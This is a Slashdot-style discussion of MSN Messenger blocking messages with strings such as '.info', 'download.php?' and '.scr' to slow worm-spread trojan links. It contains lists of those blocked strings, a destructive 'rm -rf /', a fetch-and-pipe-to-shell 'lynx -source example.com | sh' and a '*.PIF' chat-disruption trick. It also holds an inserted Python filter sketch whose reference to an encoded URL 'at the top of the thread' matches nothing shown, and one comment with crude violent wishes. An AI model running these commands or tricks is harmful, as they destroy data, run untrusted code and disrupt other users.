      Microsoft, and with them much of the computing world, is looking at this in terms of "fix each exploit as they come along" and they are ignoring the bigger picture of "what is it about this situation that makes so many exploits possible?" This is a "whack-a-mole" situation and it's what leads to so many half-assed, inelegant solutions like blocking IMs that contain certain strings. This sort of filtering, along with virus scanners, spyware scanners, and all after-the-fact "cleaners" need to be recognized for the superficial "band-aid" solutions that they are; that is, perhaps useful for damage control but certainly not a real solution.

      Of course perfect security is not possible, but when the difference between damage control and real prevention is more commonly understood, we will be one step closer.
      --
      It is a miracle that curiosity survives formal education. - Einstein
    5. Re:Oh please. by rat10177sd · · Score: 0

      Or, all the wasted bandwidth dedicated to OMG PONIES.

      Do Something to Somebody Quick... Boris Badanov

    6. Re:Oh please. by Ant+P. · · Score: 1

      You know, you can minimise that window just the same as you minimise the IM client's buddy list full of idle users. There's nothing forcing you to stare at it all day.

    7. Re:Oh please. by BenoitRen · · Score: 1

      The point is that on IRC you see a bunch of people connected, and often no one talking. So why use it?

      Truly, idling is a disease. It exists on IM clients too, but the ratio is far better than on IRC, where 90% of the connected people seem to idle at any time.

    8. Re:Oh please. by Kalriath · · Score: 1

      You know, Google does the same thing with their search engine. If you appear to be using it an inordinately large amount, their search engine will blacklist your IP and throw 403 forbidden every search you send. There are also several search terms they block as well (such as "Powered by IP.Board 2.0.0" and "phpBB2 x.x.x") which cause a 403 when searched for (and no results, and a message telling you that your search term was blocked because it looked like a virus)

      --
      For a site about things like basic rights, Slashdot users sure do like to censor "dissent".
    9. Re:Oh please. by Anonymous Coward · · Score: 0

      Both searches just worked fine for me

    10. Re:Oh please. by Tama00 · · Score: 2, Insightful

      I don't know why this is flagged as flame bait, this guy is correct.

      Microsoft censored the words to stop those stupid worms going over everyone's msn account, you know those stupid viruses that say, "i found a pic of you at www.somewhere.com/download.php?name=virus" and then some silly teenage girl would go, OMG REALLY and click on it, now she has the virus and it's telling all her contacts the same thing.

      So how do they put a stop to this, just censor the bloody url so the message won't send.

      Some of you guys on slashdot just have got to realise that MOST PEOPLE WHO USE COMPUTERS ARE _NOT_ AS SMART AS YOU! Some won't update their programs, others won't know how to remove the virus and even more will click on stupid links like that.

  33. Fix what? by defile · · Score: 4, Insightful

    Personally, I'd rather they fix the vulnerabilities that make those strings dangerous in the first place: it's not like IM is the only place a URL can get on your machine.

    Someone want to tell me how you fix a user who downloads and runs untrusted executable code?

    I've seen plenty of Linux n00bs get tricked into running rm -rf /. Or lynx -source example.com | sh

    MSN implementing filters on certain strings is just a small measure in a huge arms race any major IM system has to deal with.

    PS. You can save yourself the trouble of replying if you're going to tell me Linux only allows the user to destroy all of his files and not the entire OS.

    1. Re:Fix what? by Anonymous Coward · · Score: 0

      Someone want to tell me how you fix a user who downloads and runs untrusted executable code?
      Send him to a veterinarian? They fix cats and dogs all the time, and humans aren't too different.
    2. Re:Fix what? by Random832 · · Score: 1

      PS. You can save yourself the trouble of replying if you're going to tell me Linux only allows the user to destroy all of his files and not the entire OS.

      Telling you that would be false anyway, see "Run this command as root: ..." or "type 'sudo rm ...' and then it'll ask for your password and type that".
      --
      We've secretly replaced Slashdot with new Folgers Crystals - let's see if it notices.
  34. Re:How people named Fanny deal with it by retrosteve · · Score: 1
    How people NAMED Fanny deal with that, I can't imagine.

    ...probably about the same way that people named Dick, Peter, John Thomas, or Willie do. LOL

  35. Not Just MSN by eegad · · Score: 1

    Amazingly enough, I just discovered this bug in Lotus Sametime a couple of days ago. Whenever I sent a message with a filename ending in .scr, it sent a blank line to the recipient instead. I haven't verified with any of the other identified strings. Maybe there's a common piece of crapware they're both using?

  36. Another blocked keyword? by Anonymous Coward · · Score: 0

    I ran into this problem a few months back, trying to paste the url http://www.scrapheap-challenge.com/ to a friend of mine. Absolutely refused to send unless I put a space in there somewhere.

    1. Re:Another blocked keyword? by Kalriath · · Score: 1

      I ran into this problem a few months back, trying to paste the url http://www.scrapheap-challenge.com/ to a friend of mine. Absolutely refused to send unless I put a space in there somewhere.

      Nope.

      (Slashdot, if I see that fucking "It's been 1 minute since you last posted a comment" again...)
      --
      For a site about things like basic rights, Slashdot users sure do like to censor "dissent".
    2. Re:Another blocked keyword? by Anonymous Coward · · Score: 0

      "(Slashdot, if I see that fucking "It's been 1 minute since you last posted a comment" again...)"

      You'll ... what exactly?

      Go away?

  37. Re:And if they didnt -- feeping creaturism by Anonymous Coward · · Score: 1, Interesting

    These vulnerabilities come from creeping featurism. It's better for their
    business model to have all these neat features, even if no one uses them.
    Everyone who upgrades is hoping for bug fixes, not new features, but
    M$ themselves have said of course they like the current model that keeps
    the bucks flowing without them having to make this stuff safe or even work
    correctly. They know people are looking for fixes, but not providing them
    is what keeps the suckers on the treadmill of upgrades. Hey people -- software
    doesn't really wear out or anything like that, especially well written stuff.

    Some decisions made a long while back make it virtually impossible for them
    to make all this safe in any normal meaning of the word. OLE (then activeX and then COM)
    come to mind, as well as the ability of any app to broadcast messages (including
    "shut down now" or "eat all this data") make it impossible to make things
    safe unless they are disabled. There go all the "features" so it isn't going
    to happen.

    M$'s approach to "security" included for example, breaking DOS on Win2k in SP2
    as it had access to hardware and therefore was unsafe. Never caused us a problem
    as we were always careful. But -- to replace our old but perfectly serviceable
    DOS CAD software would have cost over $20,000. So we now run it in Linux under
    a dos emulator. And we're pitching windows completely out of our shop as it becomes
    possible -- we still keep a few dual-boots around to support windows software we've
    written for customers but we boot to Linux by default and choice.

    At least in Linux, when there's a feature, it was thought out re too-easily-installable
    insecurities.
    There's more than one way to do it, in nearly every case.

  38. The Vulnerability Is... by EXTomar · · Score: 1, Interesting

    ...that MSN allows the user to run things it never should. Or in other words, one should reasonably expect that using MSN Messenger won't screw up their machine. You should be able to feed it any number of URLs from anywhere, trusted or untrusted sources, and it shouldn't do anything bad let alone second guess whether or not the information sent is "good" or "bad". Here is a hint: Untrusted data sources serve untrusted data. Why does Microsoft consider it a feature that MSN Messenger blindly runs any files fed to it? And "asking for confirmation" is not sufficient.

    Having any IM program make it so easy to run applications from questionable sources is not a secure feature let alone the debate whether or not it is a good one. Asking "Run this? Yes/No" doesn't make the feature any better. Why do people keep thinking it is? MSN Messenger shouldn't be doing this period where the "fix" of filtering on "bad data" by extension is laughable.

  39. Before calling everyone morons... by _Shorty-dammit · · Score: 1

    perhaps you should consider exactly why it is that you think IRC is the best means of communication. Seriously? You think IRC is the best means of communication? No wonder I have so much trouble communicating with someone by going up to them and talking to them in person. I should try using IRC next time. Communication always works so much better when there's no pesky voice inflections or body language to deal with, and when there's things like network lag or netsplits. I find I always get my point across when the other person sees half of my message 5 minutes later, and then I disappear in the netsplit before getting the rest of my thought out. You're right, IRC is the best.

    1. Re:Before calling everyone morons... by arcade · · Score: 1

      perhaps you should consider exactly why it is that you think IRC is the best means of communication. Seriously? You think IRC is the best means of communication? No wonder I have so much trouble communicating with someone by going up to them and talking to them in person. I should try using IRC next time. Communication always works so much better when there's no pesky voice inflections or body language to deal with,

      I don't know if you're being dense on purpose or not, but it should've been pretty obvious that we were talking about communication over the internet and not in the real world.

      Even so, communication has a tendency to work better over the network than in the real world for many people. I'm not one of those guys as I'm pretty extrovert (and obviously you too) - but many MANY people prefer email or instant messaging to either face-to-face conversation or telephone calls.

      and when there's things like network lag or netsplits. I find I always get my point across when the other person sees half of my message 5 minutes later, and then I disappear in the netsplit before getting the rest of my thought out. You're right, IRC is the best.

      One of the _Really Good Things_ about IRC is that you just have an IRC client attached to your screen somewhere, and attach to that screen wherever you are. It's rather okay to have a local channel for yourself and your main friends - where you just chat on and off when you have time - not necessarily needing anyone to reply immediately.

      More instant than email. Less nagging than other IM programs.

      --
      "Rune Kristian Viken" - http://www.nwo.no - arca
  40. Not remotely new news... by MooUK · · Score: 1

    This isn't at all new. A few friends and I discovered at least one of these independently over a year ago, and we then found it was a known but little publicised situation before that.

  41. Vulnerabilities by TopSpin · · Score: 2, Insightful

    I'd rather they fix the vulnerabilities

    How would you detect the idiocy level of the recipient? If you spam a thousand accounts with "OMG check this http://somedomain/hot-teen-s3x.scr" you just know some fraction of the audience will dutifully follow the link and then dismiss every prompt that appears trying to prevent installation.

    Worse, after they get their own machine hacked, they'll blame MSN. They'll contact whatever 'customer service' facility is provided and scream bloody murder. If they manage to get fired as a result they may even sue. Don't doubt that there are employers capable of getting litigious with MSN over it, also.

    Sadly, this is the reality of operating an IM/Email/SMS service today. Look carefully at that graphic and realize that it is not an exaggeration.

    --
    Lurking at the bottom of the gravity well, getting old
    1. Re:Vulnerabilities by grcumb · · Score: 1

      I'd rather they fix the vulnerabilities

      How would you detect the idiocy level of the recipient? If you spam a thousand accounts with "OMG check this http://somedomain/hot-teen-s3x.scr" you just know some fraction of the audience will dutifully follow the link and then dismiss every prompt that appears trying to prevent installation.

      You know, I think you've got a point - in theory. In practice, however, stupid users tricks just don't have the same catastrophic effect in Linux or OSX. You can point to all kinds of technical details that make it way, but ultimately, you just have to accept that Windows is the least secure desktop environment in wide use today.

      Worse, after they get their own machine hacked, they'll blame MSN.

      Horse hockey. If people blamed the manufacturer for virus infections, Microsoft would be awash in a sea of litigation. I'll take things one step further and assert that one of the biggest problems software users face is that people do not blame software manufacturers for faults such as this. It's because of this that software security remains an externality for most businesses.

      Debugging is still seen as a cost centre, not a profit-driver. And that would be tragic if it weren't so close to being criminal.

      --
      Crumb's Corollary: Never bring a knife to a bun fight.
    2. Re:Vulnerabilities by Gunstick · · Score: 1

      You know how MS addresses software failures like this?

      With popups!
      So the user clicks on OK and then it's the user's fault. Not fault of MS for creating an inherently faulty product.

      But that there is no user reading the popups or even understanding them is not a problem?
      Or even that MS users are nowadays used to just click OK on any popup.

      "Why did you click OK" - "why not" - "did you read what it said" - "no, should I?"

      --
      Atari rules... ermm... ruled.
  42. PIF your conversation by Gnaget · · Score: 1

    This has been going on for years. PIF at least was censored out about 2 years ago after a virus went around. It's not all bad though, now you can PIF a conversation. When you want to end a multiuser chat, type in *.PIF and everyone will be knocked out.

  43. The Solution! by causality · · Score: 4, Insightful

    The solution?

    Apply some idea of "common carrier" status to MSN. Like the telephone companies, as long as they do not attempt to edit or censor the content that passes through their networks, in any way, then they are not responsible and cannot be held liable for any damage caused by such content. But the moment they start taking measures like this to try to "sanitize" the content of the network, make them legally liable to pay damages for any successful attack/exploit that they are unable to prevent.

    Overnight, this stupidity would go away. It would also set a great precedent for any other companies that wish to do this.

    --
    It is a miracle that curiosity survives formal education. - Einstein
    1. Re:The Solution! by Anonymous Coward · · Score: 0

      It's a private company providing a service for free. They can do what they like. Nobody is going to get them to be a "common carrier." If you're really expecting to rely on MSN for relaying important messages, at least use a client that supports OTR encryption; or preferably switch to Jabber.

    2. Re:The Solution! by inquisitor · · Score: 1

      It would also mean that MSN would be full of spam, scammers, trojan links and so on and Microsoft would be powerless to stop them; it would kill the service overnight. Right now it's fairly sane.

      Let's actually understand what Microsoft are doing here: this is not fixing a vulnerability in MSN, as any chat client will send you a URL or can be programmatically controlled (often a useful feature in real life); all these messages which the client is trying to block are simple URLs, not ways to exploit the Messenger client but the user.

      No, this is a badly flawed user protection measure. MSN worms don't spread across MSN as such; what they do is send trojan URLs via the MSN client to the infected user's contact list. The URL of course does not open in Messenger - when you click on it (and don't forget, pidgin has clickable URLs too) Messenger sends it to your HTTP protocol handler, which could be Firefox or Safari or Opera or IE depending on user preference, so any exploit on the server end would be for the browser. However, these are generally simple: it downloads iamatrojan.exe and then you choose to run it, and then it messages all your MSN friends with itself and installs a whole bunch of badware.

      Hence the blocks on *.info (full of scammers, very little legitimate content) and download.php (generally a filename used by scammers, as they find it easy to get into servers running PHP) - it's impossible to get a lot of virus sites taken down legally as they're all either hosted in the ex-Soviet Union on certain Seemingly Dodgy ISPs or on r00ted home boxes. Worse, there's way too many of them. (The other user protection mechanism Microsoft have recently taken is user-side encryption and access protection of the contact list, but you need the newest Live Messenger for that.) This seems to be what forced Microsoft into putting this block in; it's wrong, but at least you can see the reasoning.

      I really can't see how pidgin et al could actually protect against the same sort of attack without a word filter of some sort, although this one really needs to be more finely grained. Maybe a distributed, user-reported "phishing list" style system (as now used by Firefox and Opera) would be a good move.
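
An added example, not part of the comment above and not MSN's or Pidgin's code: a sketch of the "more finely grained" filter the comment asks for, next to the whole-message substring match described in this thread. It uses three of the strings reported here (`.info`, `download.php?`, `.scr`); the function names, the rule sets and the sample messages are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Strings this thread reports as blocked anywhere in a message.
NAIVE_SUBSTRINGS = [".info", "download.php?", ".scr"]


def naive_blocked(message):
    """Whole-message substring match: the behaviour the thread describes."""
    lowered = message.lower()
    return any(s in lowered for s in NAIVE_SUBSTRINGS)


# Hypothetical finer-grained rules: each applies to one URL component only.
BLOCKED_TLDS = {"info"}
BLOCKED_EXTENSIONS = (".scr",)
BLOCKED_SCRIPTS = {"download.php"}   # only when a query string follows

URL_RE = re.compile(r"https?://[^\s<>]+", re.IGNORECASE)


def canonical_parts(url):
    """Return (host, decoded lower-case path, query) for matching."""
    parts = urlsplit(url)
    host = (parts.hostname or "").rstrip(".")
    path = parts.path
    # Percent-decode until stable (bounded), so an encoded spelling of a
    # path is compared in the same form as the plain spelling.
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return host, path.lower(), parts.query


def url_aware_verdict(message):
    """Return [(url, reason)] for URLs that match a rule; [] means deliver.

    The reason lets the service tell the sender why a message was refused
    instead of failing silently.
    """
    hits = []
    for match in URL_RE.finditer(message):
        url = match.group(0).rstrip(".,);!?")   # drop sentence punctuation
        try:
            host, path, query = canonical_parts(url)
        except ValueError:
            hits.append((url, "unparseable"))   # fail closed on bad URLs
            continue
        filename = path.rsplit("/", 1)[-1]
        if host.rsplit(".", 1)[-1] in BLOCKED_TLDS:
            hits.append((url, "tld"))
        elif filename.endswith(BLOCKED_EXTENSIONS):
            hits.append((url, "extension"))
        elif filename in BLOCKED_SCRIPTS and query:
            hits.append((url, "script"))
    return hits


if __name__ == "__main__":
    # Constructed sample messages.
    samples = [
        "Can you resend readme.info and the .scrollbar CSS?",
        "look http://evil.example.com/down%6Coad.php?id=1",
        "try http://www.example.com/badstuff/newscreensaver.scr!",
    ]
    for text in samples:
        print(naive_blocked(text), url_aware_verdict(text), text)
```

The first sample contains no URL at all, yet the substring match refuses it; the second is the encoded spelling quoted at the top of the thread, which the substring match delivers and the URL-aware check catches after decoding.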

    3. Re:The Solution! by dtobias · · Score: 1

      I have legitimate sites in .info domains.

      --
      --Dan
      Web Tips
  44. Disproving the article by jb.hl.com · · Score: 1

    joe | optimism is just another word for false hope says: (18:57:18)
    http://yro.slashdot.org/article.pl?sid=07/08/05/1311216
    joe | optimism is just another word for false hope says: (18:57:25)
    I am now going to disprove this article
    joe | optimism is just another word for false hope says: (18:57:27)
    *ahem*
    joe | optimism is just another word for false hope says: (18:57:52)
    Microsoft suck massive donkey cocks. I really, really hope someone kicks Steve Ballmer right in the fucking head, preferably with a steel toed boot
    joe | optimism is just another word for false hope says: (18:58:23)
    Really, I hope someone burns their shitty excuse for a building to the ground. Fucking cunts.

    Messages got through OK. Dunno what the problem is, personally.

    --
    By summer it was all gone...now shesmovedon. --
  45. 'Protocol' /= 'client application' by Bearhouse · · Score: 0, Offtopic

    Pidgin
    http://sourceforge.net/projects/pidgin/
    (formerly Gaim), see also
    http://en.wikipedia.org/wiki/Pidgin_(software)
    works fine with MSN.

    Only issues are security, (passwords stored in plaintext - as with most other IM apps) and peer to peer file not working yet via MSN, (goes via servers so is slower). Neither are major hindrances.

    1. Re:'Protocol' /= 'client application' by Anonymous Coward · · Score: 0

      You could try to use Pidgin with the OTR plugin (if the rest is using it too)

      http://en.wikipedia.org/wiki/Off-the-Record_Messaging

    2. Re:'Protocol' /= 'client application' by Bearhouse · · Score: 1

      Flamebait? Get a life...

    3. Re:'Protocol' /= 'client application' by bluemonq · · Score: 1

      While it's nice and all to use other clients, it doesn't do much good when, say, filtering is *server*-implemented per FP.

  46. First they came for the ... by Anonymous Coward · · Score: 0

    * First they came for the MSN users and I did not speak out because I was not an MSN user.

    * Then they came for the AIM users and I did not speak out because I was not an AIM user.

    * Then they came for the Yahoo! users and I did not speak out because I was not a Yahoo! user.

    * Then they came for us, the Jabber users, and ... actually they couldn't do fucking anything to Jabber. ;-)

    As a side note, the server can't read/block your IMs if they are encrypted. Why aren't you securing your communications in the first place? Pidgin Encryption -> http://pidgin-encrypt.sourceforge.net/

  47. Yet another reason to use IRC by PeterPowell · · Score: 1

    I suppose this is *yet another* good reason to use IRC

    -pp

  48. email too by smchris · · Score: 1

    I made the choice of using ".info" for my DSL server. I know a college that bounced email if it has ".info" in the BODY of the email.

    1. Re:email too by Lehk228 · · Score: 1

      well then now you know not to be such a cheapskate. the downside to a cutrate domain is you have cutrate neighbors.

      --
      Snowden and Manning are heroes.
  49. Not just censorship by BenoitRen · · Score: 1

    I'm the project owner of the msnmsgr project at MozDev, and I looked into this. I don't know what version of the protocol Adium uses, but mine uses MSNP8. When my message contains one of the things it censors, the switchboard server immediately closes the connection. It's not just censorship; you get booted.

  50. Even better by Anonymous Coward · · Score: 0

    Stop using MSN and use jabber or something.

  51. Old News by Anonymous Coward · · Score: 0

    Isn't this news *really* old? I thought these strings have been blocked for years now, or so I recall reading about them a long time ago.

  52. Real problem by Anonymous Coward · · Score: 0

    The real problem is between the keyboard and the chair. If someone sends you a URL of http://www.example.com/badstuff/newscreensaver.scr with the message "Really great, you have to try this out!" and the person downloads it, runs it, installs it and infects their computer how can any "security" in Windows (or any other operating system) help this poor deluded user?

    Face it, this problem has been around since the first "general purpose" computer fell into an untrained user's hands. Someone handed them a floppy with something they just had to see on it and got their computer screwed up. The methods of infection have improved somewhat - the education, knowledge and skill of the user has not.

    I don't see a defense here without making the computer unchangeable by the user.

  53. MSN Is Bad by RAMMS+EIN · · Score: 1

    So you're saying MSN is bad? Gosh, I had no idea! Quick, let's all switch!

    Hey, I just heard there are all these open standards that you can use to chat with one another! You won't be dependent on the goodwill of a single company, you needn't worry about people sniffing your messages, and there are lots of other advantages, too!

    Guys? Gals? Why is nobody coming with me...?

    --
    Please correct me if I got my facts wrong.
  54. Items missing from the list by dilvish_the_damned · · Score: 1

    * .info
    * profile.php? (including '?')
    * download.php? (including '?')
    * gallery.php
    * pics.php
    * ListAllTopics.php
    * .scr (source)

    Where are the .asp filters? Or is windows mostly vulnerable to php?

    --
    I think you underestimate just how much I just dont care.
    1. Re:Items missing from the list by Kalriath · · Score: 1

      More likely is that they're added at need, and they haven't seen any viruses in the wild that spread via MSN and use .asp files. Expect to see some if suddenly there's a virus that spreads by sending "Hey check out www.badwebsite.com/goto.asp?urlname=forums for free hardcore".

      --
      For a site about things like basic rights, Slashdot users sure do like to censor "dissent".
  55. Spam? by Coolhand2120 · · Score: 1

    Anyone think maybe it's just a spam filter? I don't use IM of any kind (IRC etc) but when I HAD to in the past I received a lot of spam IM. If 90% of the spam IM has these strings in it (an exaggeration to be sure) then why not stamp it out? I'm sure you wouldn't complain too much if the message you sent to your GMAIL account with the subject 'replica watches with pharmaceutical hudia' didn't go through. I think a good test would be to try the string "Bill Gates sucks Steve Jobs cock", if this makes it through well then, everything important works.

  56. Re:How people named Fanny deal with it by Grimbleton · · Score: 1

    Yeah, my name is Peter Richard (Last name omitted), so imagine the fun I've had.

  57. Well, .php... by SanityInAnarchy · · Score: 1

    I don't suppose it's occurred to Microsoft that PHP is a perfectly valid scripting language used by a significant number of... No, of course they wouldn't. To Microsoft, real websites use ASP.NET...

    I mean, I frequently send links to specific webcomics to people I know on IM, but most of the people I know are on Yahoo or something better.

    --
    Don't thank God, thank a doctor!
  58. Worth bringing up again! by SanityInAnarchy · · Score: 1

    It's still moronic, and I still think MSN should stop doing it.

    And I will keep bringing this up to people who use MSN until either MSN stops, or everyone I know is using some other IM client.

    --
    Don't thank God, thank a doctor!
  59. censorship by Anonymous Coward · · Score: 0

    If they are applying censorship criteria they are also MONITORING what you type... just something to think about. IM = "Instant Monitoring"

  60. Not censored, I tried it myself by Graviteh · · Score: 0

    http://xs218.xs.to/xs218/07310/censorship.jpg Don't kill me because the screenshot features Digg, but I tried sending these myself and my partner on the other end got them just fine. I wonder if this censorship is just situational or happens to only some people, and/or happens at random times.

    --
    Dance Dance Revolution.
    1. Re:Not censored, I tried it myself by Random832 · · Score: 1

      It might vary per server. I saw this story somewhere else and .info wasn't on the "full list" from someone who actually hacked a client to ask the server for the whole list

      http://forums.worsethanfailure.com/forums/18/ShowForum.aspx

      http://www.amsn-project.net/forums/viewtopic.php?t=157&postdays=0&postorder=asc&start=30

      "image001.png" is blocked - because no-one ever uses a filename for something other than what someone else has used that filename for, no matter HOW generic it is, once someone's used a filename it's "taken" forever and always refers to that one evil exploit it was used for.

      --
      We've secretly replaced Slashdot with new Folgers Crystals - let's see if it notices.
  61. Full list by marcansoft · · Score: 2, Interesting

    kakaroto from the amsn project somehow obtained the full censored regexp list. There are about 90 in total.

    http://www.amsn-project.net/forums/viewtopic.php?t=157&postdays=0&postorder=asc&start=30

  62. They ought to censor.... by madbawa · · Score: 2, Funny

    ....msmsgs.exe

  63. Old news by Buzer · · Score: 1

    I remember submitting similar story about 1.5-2 years ago and it got rejected. The only difference is that now MSNM tells the message couldn't be sent, back then it simply got censored (more times than once I pasted url with download.php? to friend and asked a bit later if they had already downloaded it to direct them further and they were like "Downloaded what?")

  64. Latest version introduced this - Use ZIP or RAR by Anonymous Coward · · Score: 1, Informative

    It's the latest update (July) that introduced this. I hadn't upgraded but a friend did. He could no longer receive MP3 files (We're game developers; Our sound files are all MP3 format! Nothing illegal here!!!!!!!)

    Zipping is the way around this filter.

  65. Get off my lawn, I'm keeping that frisbee! by Scrameustache · · Score: 1

    I had the same problem.... I picked better friends.
    Anyone that I have any relation with knows that I will not contact them via MSN, AIM, My Space, Live Journal or any of their like.

    You must be ever so much fun at parties!

    I suggest that they learn to use IRC or obtain a HAM radio license with a morse code rating, and I will gladly send them an instant message. [...] If they do not find a medium that is commonly available and required for business communications as acceptable, then I really don't want to be associated with them.

    Bah Humbug!

    Make sure they don't waste any of that coal in the chimney, too!
    --
    You can't take the sky from me...

  66. catch 22 by Scrameustache · · Score: 1

    This isn't censorship; it's just a poor firewall. The difference is that the former is for stifling human communication, while the latter is to protect machines from malicious software.

    Tell it to china.
    So some of what they arbitrarily block is for asinine security reasons? When hackers come up with the key to a Microsoft owned DRM ploy, wanna bet that string will also be blocked, server side, for security?

    --

    You can't take the sky from me...

  67. Lies and pretenses by Scrameustache · · Score: 1

    Personally, I'd rather they fix the vulnerabilities that make those strings dangerous in the first place: it's not like IM is the only place a URL can get on your machine.


    Do you really think they're diverting resources away from fixing bugs so that they can add "censorship" features to IM? Perhaps this is just one effort among multiple efforts to correct problems AND mitigate their effects?

    test.info
    12:45
    Could not send; a connection error occurred.


    They did not correct a problem, they created a new one.
    How hard would it be to have a message "could not send, content of message is not allowed"?
    It would cause people to realize there is something wrong, rather than blaming it on the dog, as they choose to do. So they censored that tidbit by censoring our messages, the bastards.
    --

    You can't take the sky from me...

    1. Re:Lies and pretenses by Fastolfe · · Score: 1

      How hard would it be to have a message "could not send, content of message is not allowed"?

      I don't know, but I bet it would cost more to present the user with that message than it would cost to simply drop the messages on the floor. I absolutely agree that this is a poor user experience, but I have no clue how easy or difficult it would be to make it better. Do you? A good manager would then compare that cost with the estimated impact on the users. How many users send legitimate messages that would be caught by this filter? Enough to matter? Do you have all of the facts here that would qualify you to make that decision?

    2. Re:Lies and pretenses by Scrameustache · · Score: 1

      Do you have all of the facts here that would qualify you to make that decision?

      Let's not pretend this was a decision of facts when we all know it was a decision of PR.
      --

      You can't take the sky from me...

  68. can't we all just get along? by teh_chrizzle · · Score: 1

    I get it.. you are one of THOSE users, who thinks he knows more than we do about how computers work, and how corporate IT should be run.

    my bet is that the parent poster is a developer or a DBA. the "devs vs. IT" battle is an old one. i'll sum it up: IT guys are fascist pigs, and dev's are whiny spoiled brats. (see also: video conferencing vs IT, R&D vs. IT, and IT vs. the NOC) it's true, everyone really needs to lighten up :-)

    it's wrong for people to subvert IT policies. it's wrong for IT departments to implement policies that people have to subvert in order to do their jobs. as we all know, two wrongs don't make a right.

    there are two ways to fix the problem:

    one way is for IT to exchange compliance for support. IT agrees only to support compliant machines. it will not support non-compliant machines, nor will it remove them. if you want to be a local admin and download tons of crazy crap from the net, go ahead, but you have to provide your own support for your issues. if you have a problem that you can't fix, IT will happily ghost your machine back into compliance or repair any defective hardware. if it has been determined that your machine has done something wrong (transmitted a virus, contained material that puts the company at risk of legal action) then we will pull your network connection until your machine is compliant once again. a clearly defined and easily referenced policy of "quid pro quo" support makes life easier for the IT department and can afford some much needed freedom for the "lone advanced user" who so often runs afoul of draconian IT practices.

    the other option is the separation of development and corporate assets. a development network with few restrictions is available, but it will have no access to or from the corporate LAN or the production environment. all machines on the development network are the sole responsibility of the developers. the DevNet is managed in some manner to keep corporate machines out, and the CorpNet is managed in a similar manner to keep the development machines out (no switching network cables you naughty devs!) the IT department can then administer uniformity on CorpNet until it is blue in the face, and the devs get to be free to do as they please on the DevNet until someone gets sued or arrested.

    in both cases, people who think they are smarter than the IT guys get to do as they please and must play ball in order to get support. hilarity ensues whenever one group has to turn to the other for help.

    --
    sarcasm:
    -noun
    1. harsh or bitter derision or irony.